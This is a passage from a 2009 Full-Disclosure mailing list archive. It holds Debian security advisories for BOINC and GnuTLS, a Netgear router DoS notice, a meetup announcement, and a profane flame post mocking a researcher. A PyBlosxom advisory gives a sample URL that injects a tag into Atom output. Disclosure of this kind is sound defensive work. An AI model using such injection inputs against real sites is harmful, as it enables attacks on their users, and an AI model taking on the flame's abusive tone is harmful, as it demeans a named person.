recommend that you upgrade your boinc packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Stable updates are available for amd64, arm, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/b/boinc/boinc_5.4.11.orig.tar.gz Size/MD5 checksum: 5561690 268c8f6f19d5def378e7d2fbacc2d4eb http://security.debian.org/pool/updates/main/b/boinc/boinc_5.4.11-4+etch1.dsc Size/MD5 checksum: 1174 2d007ac10e6c4033363f8b0978ecfdfa http://security.debian.org/pool/updates/main/b/boinc/boinc_5.4.11-4+etch1.diff.gz Size/MD5 checksum: 42159 8bf8d8b4fd9a7bb3963f1af4b3a6f6e0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_amd64.deb Size/MD5 checksum: 742302 510dc201af61610b050bc3380c9d100a http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_amd64.deb Size/MD5 checksum: 331738 3c03b02467d1295a41e228e887e35c8a http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_amd64.deb Size/MD5 checksum: 420030 693edd73e7f6565fcecdd4d4734c9331 arm architecture (ARM) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_arm.deb Size/MD5 checksum: 405796 8eac0ee7ccb30f4cd5db1d98b6d6bad5 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_arm.deb Size/MD5 checksum: 355172 5624689252e7f4a17ab7ddd7b32c323e http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_arm.deb Size/MD5 checksum: 776070 0a548d55f73c61821276aa015f4e69bb i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_i386.deb Size/MD5 checksum: 402674 be5f9b3f94890248963a8fdbc9471251 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_i386.deb Size/MD5 checksum: 340560 935dd3f2c5c51d66dd77c698253458af http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_i386.deb Size/MD5 checksum: 747016 7bc3304531f57ac1e667fba68fe16cd0 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_ia64.deb Size/MD5 checksum: 552872 9c0053cf650774c12dedb80d6c0918c7 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_ia64.deb Size/MD5 checksum: 445946 46d0dae4d46304332138ea7ecdcc773e http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_ia64.deb Size/MD5 checksum: 827448 adb080334dd148ca08d831a1656d8e52 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_mips.deb Size/MD5 checksum: 760244 640cd45d564c8428a9e301723e11bb6d http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_mips.deb Size/MD5 checksum: 364418 84aa41b3259eebd66f21811ffd693856 http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_mips.deb Size/MD5 checksum: 453980 3200f312a78a7fb1b179e88b3da12095 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_mipsel.deb Size/MD5 checksum: 362924 a0b49bd7aa24c8b2c8ea8412413b7f8a http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_mipsel.deb Size/MD5 checksum: 752698 cff499021e2c48bbca805f4e5ff74e07 http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_mipsel.deb Size/MD5 checksum: 452180 88876196db57020ad9cfd8fa0d9fa781 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_powerpc.deb Size/MD5 checksum: 746960 53a8fdb3b93f7a01951f646781939499 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_powerpc.deb Size/MD5 checksum: 357802 88bb6361dc2a34729ef49b1bcfc6f86f http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_powerpc.deb Size/MD5 checksum: 436526 ebde4d9b7fa9357250eac6edd058fbf2 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_s390.deb Size/MD5 checksum: 405746 f428c0a13fae9d569e8bb4a27d8d2d30 http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_s390.deb Size/MD5 checksum: 733522 fc578aa93e65eae44b48457411f6eda3 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_s390.deb Size/MD5 checksum: 340934 f23cc5421e73e3d548b936ac3f20b40f sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/b/boinc/boinc-dev_5.4.11-4+etch1_sparc.deb Size/MD5 checksum: 424774 773aa13cb3453920cfed95d93d8d7070 http://security.debian.org/pool/updates/main/b/boinc/boinc-client_5.4.11-4+etch1_sparc.deb Size/MD5 checksum: 339330 082502b633ae3d84aa3b87fdb0dbee40 http://security.debian.org/pool/updates/main/b/boinc/boinc-manager_5.4.11-4+etch1_sparc.deb Size/MD5 checksum: 775476 5fa72e818fad34c6dda5a6fa6df99f0a These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkmPTrAACgkQXm3vHE4uylrBNwCgkVXF05tMtB72Tr/8ki5aPUxO 6wgAoKKK3m2RkjTUIBbF7LJl7lJMJ9bN =uZvI -----END PGP SIGNATURE----- From rembrandt at jpberlin.de Sun Feb 8 23:51:03 2009 From: rembrandt at jpberlin.de (rembrandt) Date: Mon, 9 Feb 2009 00:51:03 +0100 Subject: [Full-disclosure] Netgear SSL312 Router - remote DoS Message-ID: <20090209005103.36e108c2.rembrandt@jpberlin.de> Attached to this e-Mail is an advisory related to the Netgear SSL312 VPN router (propably other devices of Netgear are affected as well but this has not been tested). The advisory can also be found at: http://www.helith.net/txt/netgear_ssl312_remote_dos.txt Dear netgear Team: Please consider working together with the OSVDB team to take care of all known issues related to Netgear products or to even just have working contact data avaiable. Kind regards, Rembrandt -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: netgear_ssl312_remote_dos.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090209/0164592a/attachment.txt -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 833 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090209/0164592a/attachment.bin From namn at bluemoon.com.vn Mon Feb 9 02:34:02 2009 From: namn at bluemoon.com.vn (Nam Nguyen) Date: Mon, 9 Feb 2009 09:34:02 +0700 Subject: [Full-disclosure] [BMSA-2009-02] XML injection in PyBlosxom Message-ID: <20090209093402.14561620.namn@bluemoon.com.vn> BLUE MOON SECURITY ADVISORY 2009-02 =================================== :Title: XML Injection in PyBlosxom :Severity: Low :Reporter: Blue Moon Consulting :Products: PyBlosxom v1.4.3 :Fixed in: -- Description ----------- PyBlosxom is a lightweight file-based weblog system. The project started as a Python clone of Blosxom but has since evolved into a beast of its own. PyBlosxom focuses on three things: simplicity, extensibility, and community. In v1.4.3, PyBlosxom suffers an XML injection issue. This allows a malicious user to insert abitrary code into the XML output from PyBlosxom. The problem is with Atom flavor. Its ``head.atom`` uses ``$(url)`` and ``$url`` variables, in many places, that were not properly escaped. Injection can be made by forcing PyBloxsom to use Atom flavor such as ``http://host/path/%3Ccool%3E?flav=atom``. A tag ```` is injected in such URL. Blue Moon Consulting has verified the bug in version 1.4.3. It is highly likely that it also exists in older versions starting from 1.3. Workaround ---------- Disable Atom flavor by deleting ``atom.flav`` directory. Fix --- Users of PyBlosxom are advised to contact the vendor directly for a proper fix. Disclosure ---------- Blue Moon Consulting adapts `RFPolicy v2.0 `_ in notifying vendors. :Initial vendor contact: February 07, 2009: Initial contact sent to Will Guaraldi. :Vendor response: February 07, 2009: Will replied PyBlosxom did not use XML, so there could be no XML injection bug. :Further communication: February 07, 2009: Replied to Will that we did find such bug. February 08, 2009: Will was skeptical about the bug but asked us to file it in the bug tracker anyway. February 08, 2009: We replied that filing security bug in a public bug tracker was not our disclosure practice. We again stated our disclosure policy and asked Will to accept it before we could send him further details. February 08, 2009: Will said he would not make any agreement. We therefore decided to alert the public. :Public disclosure: February 09, 2009 :Exploit code: No exploit code is needed. Disclaimer ---------- The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 195 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090209/ceb8fc9f/attachment.bin From majormal at pirate-radio.org Mon Feb 9 17:00:35 2009 From: majormal at pirate-radio.org (Major Malfunction) Date: Mon, 09 Feb 2009 17:00:35 +0000 Subject: [Full-disclosure] London DEFCON DC4420 - February 2009 Meet - Thursday 12th Message-ID: <49906133.30905@pirate-radio.org> Following our supah successful January meet, where we actually ran out of time because of the volume and quality of talks (or was it volume of alcohol the speakers had imbibed?), this month we are going to limit the talks to 30 minutes and the number of speaking slots to 3 so we have more time for drinking/socialising in between... The lineup this month is: The Current State of Wifi - Arhont The Life of a Security Manager - Chris Sumner Java Stack Smashing - Subere There will also be a couple of workshops running in-between/after speakers: Data extraction via Firewire/demo - Guillaume Sneak preview of a $100 man-in-the-middle RFID protocol analyser - Major Malfunction (bring RFID tags!!!) And, of course... if this is your first meet... YOU will be talking! Where will all this take place? Upstairs @ The Glassblower http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z=16&iwloc=addr 42 Glasshouse St, Piccadilly, W1B 5JY Doors open from 7:00, speaking starts at 7:30 - please try to be prompt as some people need to go early to get trains back out of London. We have private use of the whole of the upstairs until 11:30. Real ale on draught : Adnams Broadside + Spitfire, 'Buccomb' and 'Doombar'. Other stuff on draught : Guinness, Staropramen, Hoegaarden, Leffe. Even more stuff on draught : Becks, Fosters, 1664 Food menu is extensive and most importantly : they do Pie - but they stop serving at 9pm! I hope to see you all there! http://dc4420.org cheers, MM -- "In DEFCON, we have no names..." errr... well, we do... but silly ones... From secnichebogus at gmail.com Mon Feb 9 18:16:47 2009 From: secnichebogus at gmail.com (Secniche Bogus) Date: Mon, 9 Feb 2009 23:46:47 +0530 Subject: [Full-disclosure] Aditya K Sood Lame Ass Secjacking. Message-ID: <5c9b0ff50902091016l16fae952wf7264f884a0424c3@mail.gmail.com> Phenomenal, Mr. Sood has yet again managed to laugh and fill us with joy. Perfect example at what level the media and security industry has become a bit (well quite a bit) of bull-fucken-shit. i). Click jacking: The new phenomenon of browser security nicely covered here http://hackademix.net/2009/01/31/all-that-clickjazz. ii). More enjoyable are the bug discussions. http://code.google.com/p/chromium/issues/detail?id=2877 http://code.google.com/p/chromium/issues/detail?id=2632 If you look carefully can you see the impatience ? Especially the comment "Your response awaited asap." Don't worry AKS a.k.a 0kn0ck we are pretty sure your bogusness is fueled by media and it like everything crapy will continue. Browser DoS is the new way to go. WARNING! Adityka K Sood will Secjack everyone ph34r!!!!. Secniche Bogus Core Operatives Division of SecNiche Security. PS: We seriously need to get a life. From fw at deneb.enyo.de Tue Feb 10 07:00:19 2009 From: fw at deneb.enyo.de (Florian Weimer) Date: Tue, 10 Feb 2009 08:00:19 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1719-1] New gnutls13 packages fix certificate validation Message-ID: <87fximdbek.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1719-1 security at debian.org http://www.debian.org/security/ Florian Weimer February 10, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : gnutls13 Vulnerability : design flaw Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-4989 Debian Bug : 505360 Martin von Gagern discovered that GNUTLS, an implementation of the TLS/SSL protocol, handles verification of X.509 certificate chains incorrectly if a self-signed certificate is configured as a trusted certificate. This could cause clients to accept forged server certificates as genuine. (CVE-2008-4989) In addition, this update tightens the checks for X.509v1 certificates which causes GNUTLS to reject certain certificate chains it accepted before. (In certificate chain processing, GNUTLS does not recognize X.509v1 certificates as valid unless explicitly requested by the application.) For the stable distribution (etch), this problem has been fixed in version 1.4.4-3+etch3. For the unstable distribution (sid), this problem has been fixed in version 2.4.2-3 of the gnutls26 package. We recommend that you upgrade your gnutls13 packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4-3+etch2.dsc Size/MD5 checksum: 967 97d676fb2a9de5a2706da79baf5fc53f http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4-3+etch3.diff.gz Size/MD5 checksum: 20931 d1f9a5483e2ff3b6f799f14cc90e0ba4 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4.orig.tar.gz Size/MD5 checksum: 4752009 c06ada020e2b69caa51833175d59f8b2 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4-3+etch2.diff.gz Size/MD5 checksum: 19550 d362897a57e2bac2f059413ea29540be http://security.debian.org/pool/updates/main/g/gnutls13/gnutls13_1.4.4-3+etch3.dsc Size/MD5 checksum: 967 c523874d91b1d19b0a59c6d51ada21e6 Architecture independent packages: http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-doc_1.4.4-3+etch2_all.deb Size/MD5 checksum: 2315360 2892fedc83604472a40cb9e16b64fad2 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-doc_1.4.4-3+etch3_all.deb Size/MD5 checksum: 2315508 9fe5532897a55d3f8b2954a7294920e1 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_alpha.deb Size/MD5 checksum: 328102 19e0618dac4d13a9d284019365ef07f9 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_alpha.deb Size/MD5 checksum: 547328 0fc6cb94c0a9b65067fc17e0db0e4e7c http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_alpha.deb Size/MD5 checksum: 523950 a149137fe64abc4b7e33d66e1345b9c0 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_alpha.deb Size/MD5 checksum: 524034 0d510406095b7f9bf9dd06b74502c94a http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_alpha.deb Size/MD5 checksum: 327990 8b39649670392f353c183032aab1040b http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_alpha.deb Size/MD5 checksum: 547418 fd17990e04770d7447e6fd136cb0f726 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_alpha.deb Size/MD5 checksum: 196336 a2385c40d8118a84442449d7720d4437 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_alpha.deb Size/MD5 checksum: 196416 9b570f6739f2071ef8e857f897b0fe73 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_amd64.deb Size/MD5 checksum: 314678 9a2fca4364ab01e77da051e1c637cace http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_amd64.deb Size/MD5 checksum: 538540 9bad40a6891bacf73ab92d492946439e http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_amd64.deb Size/MD5 checksum: 183432 04c381e380452347c0b8c866cd32a0d1 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_amd64.deb Size/MD5 checksum: 314542 bd3466107c5a3e81bae9fc6ce16b3f07 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_amd64.deb Size/MD5 checksum: 389192 7e1f1ee9b50dbe59303ee92d06d638f9 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_amd64.deb Size/MD5 checksum: 183526 deb90128a086f94d4213ae8d0ebb2aac http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_amd64.deb Size/MD5 checksum: 389078 937898ee8ebfbb6c96ec327182aa66c9 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_amd64.deb Size/MD5 checksum: 538694 30f0f5f5236de80b969ab142003facda arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_arm.deb Size/MD5 checksum: 355130 d314daec4d8653d21f5aa755b133ce44 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_arm.deb Size/MD5 checksum: 169734 a0760138aa40ef409bebc45f21482fa6 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_arm.deb Size/MD5 checksum: 283218 86a51ac92283cf4d41f8b80e208d3ea0 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_arm.deb Size/MD5 checksum: 283146 490e93a8fb47792bab27befcfaba59c4 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_arm.deb Size/MD5 checksum: 510986 734ae4e95a95858b98a9aadf3df89e27 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_arm.deb Size/MD5 checksum: 355034 d2fad7c1fa481c311272a033a1632baa http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_arm.deb Size/MD5 checksum: 511146 020e108874b330b04d28cbf111e1cb3c http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_arm.deb Size/MD5 checksum: 169790 d7904cea32e23dcd2abe3c8078029f24 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_hppa.deb Size/MD5 checksum: 435274 a50a1b0396725750c7f9b18f42ed59df http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_hppa.deb Size/MD5 checksum: 521900 81a5514ae8b882945c9d86260a985075 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_hppa.deb Size/MD5 checksum: 312696 9b01cc660ec19e94365cfe9485e69504 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_hppa.deb Size/MD5 checksum: 435428 b9b85897a5fa12e6145e44f1d811faf7 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_hppa.deb Size/MD5 checksum: 184434 3fe517f3ae76a0bb39ef2112259ee533 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_hppa.deb Size/MD5 checksum: 312786 7bf4a07c716180831b812024f9dc2bed http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_hppa.deb Size/MD5 checksum: 521782 ec2e351f911c06d10a906e35e87b17d8 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_hppa.deb Size/MD5 checksum: 184514 4a4436b484d0809e458fccd777af41a9 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_i386.deb Size/MD5 checksum: 525932 03fdffd511056bb48f00fd29a7ff0994 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_i386.deb Size/MD5 checksum: 282696 8e5d7e93c2bcd0e5b1c11b2bb76febc1 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_i386.deb Size/MD5 checksum: 171836 c7de8edce99f98a92597328a828306f4 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_i386.deb Size/MD5 checksum: 359008 b2d4fb0470fb4933e9d7f7e4d365fade http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_i386.deb Size/MD5 checksum: 358910 d3784c1606616b1053afe805e466d351 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_i386.deb Size/MD5 checksum: 282576 089b077a2856c2eb240d8ec91e34da98 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_i386.deb Size/MD5 checksum: 525814 236abc7e944de62b1c63ac2752df59d5 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_i386.deb Size/MD5 checksum: 171916 2c30fca77e49ece3c874923597113e84 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_ia64.deb Size/MD5 checksum: 229224 a8b557d93ac98d96b69e83a1ab0abe60 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_ia64.deb Size/MD5 checksum: 550142 eca44ae7ad3a622ae835bad66076bb44 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_ia64.deb Size/MD5 checksum: 528174 cb2e8a474b0f616ebdb4f7c70884a68b http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_ia64.deb Size/MD5 checksum: 229130 48c1beb6eec250eb2ef18978cb7002a7 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_ia64.deb Size/MD5 checksum: 394824 b83e917ffa852e371713c05eed6bb2ea http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_ia64.deb Size/MD5 checksum: 528024 4911b942fdb28257ce5404e0db59bf8f http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_ia64.deb Size/MD5 checksum: 550282 bb35e15bed0cd0a002c09c2a33f204e3 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_ia64.deb Size/MD5 checksum: 394664 83b0fb175ce0a9228ae66a1c2c20087d mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_mips.deb Size/MD5 checksum: 278098 839af8690670ae34de6ec1c4ecb2a11d http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_mips.deb Size/MD5 checksum: 417930 09a97882ea70cea64f7ab518f872d0d4 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_mips.deb Size/MD5 checksum: 181744 14f8d0bcae552215223083475fc102ff http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_mips.deb Size/MD5 checksum: 277980 176ba4c110568718f5310ebd88c0fad2 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_mips.deb Size/MD5 checksum: 181844 1063e31ebfce35d017cc2f52f43e7988 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_mips.deb Size/MD5 checksum: 552678 75998b98481a61f619a59fdcb195e92a http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_mips.deb Size/MD5 checksum: 418000 6de735e5e2f89169cff80b7c88124d7c http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_mips.deb Size/MD5 checksum: 552848 e7a3675995e3f76753683bd56559c097 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_mipsel.deb Size/MD5 checksum: 277818 23b61680ae1ebd6e8352efd69369a54d http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_mipsel.deb Size/MD5 checksum: 541908 5ce5c90c1938eab0e66df230cb92b99f http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_mipsel.deb Size/MD5 checksum: 541770 b1a12727513f82602064e9d9d0238d4e http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_mipsel.deb Size/MD5 checksum: 182774 ebde66ae73e094da31b94a72b4214591 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_mipsel.deb Size/MD5 checksum: 182702 5bc323ab598389c3e074f28b54d84b84 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_mipsel.deb Size/MD5 checksum: 277736 582f2204399dfecd750f9f93a3f395d1 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_mipsel.deb Size/MD5 checksum: 417036 d94700c36580f967644d95de26672633 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_mipsel.deb Size/MD5 checksum: 417180 6e5c825f8843d10a312a791b7bb7e1cf powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_powerpc.deb Size/MD5 checksum: 184590 c5a0ea676820713de26aec86ade8c61b http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_powerpc.deb Size/MD5 checksum: 184672 f8dc6ea415ba64b863f54c83eb948f4d http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_powerpc.deb Size/MD5 checksum: 388752 c1a798145290881a103431c0e61b89b5 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_powerpc.deb Size/MD5 checksum: 538638 e78c7fd529dc9b84834d868d6d3abdbf http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_powerpc.deb Size/MD5 checksum: 288958 78c75eed0f9943eebd81c197381dbf5c http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_powerpc.deb Size/MD5 checksum: 538788 5435fb5147d931b8386eacc607a23dfc http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_powerpc.deb Size/MD5 checksum: 288854 73dd971eb95f10766b75938e531b850f http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_powerpc.deb Size/MD5 checksum: 388886 9b17d971390abcda56a1dae375bb57f8 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch3_s390.deb Size/MD5 checksum: 311694 6249eb1de5c7350957867560879ab144 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch3_s390.deb Size/MD5 checksum: 184588 6350de7268b17a8698ff11f5054c6e4a http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch2_s390.deb Size/MD5 checksum: 537386 f2daa306f4815cfc6e147b89b2c9f836 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch2_s390.deb Size/MD5 checksum: 380158 1e7bdd0dd3de68c319a38071814bcf25 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13-dbg_1.4.4-3+etch3_s390.deb Size/MD5 checksum: 537530 9c94d38e0969a1a3ade7340623de07c0 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_s390.deb Size/MD5 checksum: 380300 2761ba52e1fb0b7e8f899b5c24121159 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_s390.deb Size/MD5 checksum: 311354 7a314e4d02c883e281f4eafe25f04d31 http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_s390.deb Size/MD5 checksum: 184510 05b634e19e7e85d994d5625dda5e6c52 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls-dev_1.4.4-3+etch3_sparc.deb Size/MD5 checksum: 378986 3b732e25a6bcd5c2300af4820553516f http://security.debian.org/pool/updates/main/g/gnutls13/gnutls-bin_1.4.4-3+etch2_sparc.deb Size/MD5 checksum: 169598 34390667473c6d12097ede5c2c3c3610 http://security.debian.org/pool/updates/main/g/gnutls13/libgnutls13_1.4.4-3+etch2_sparc.deb 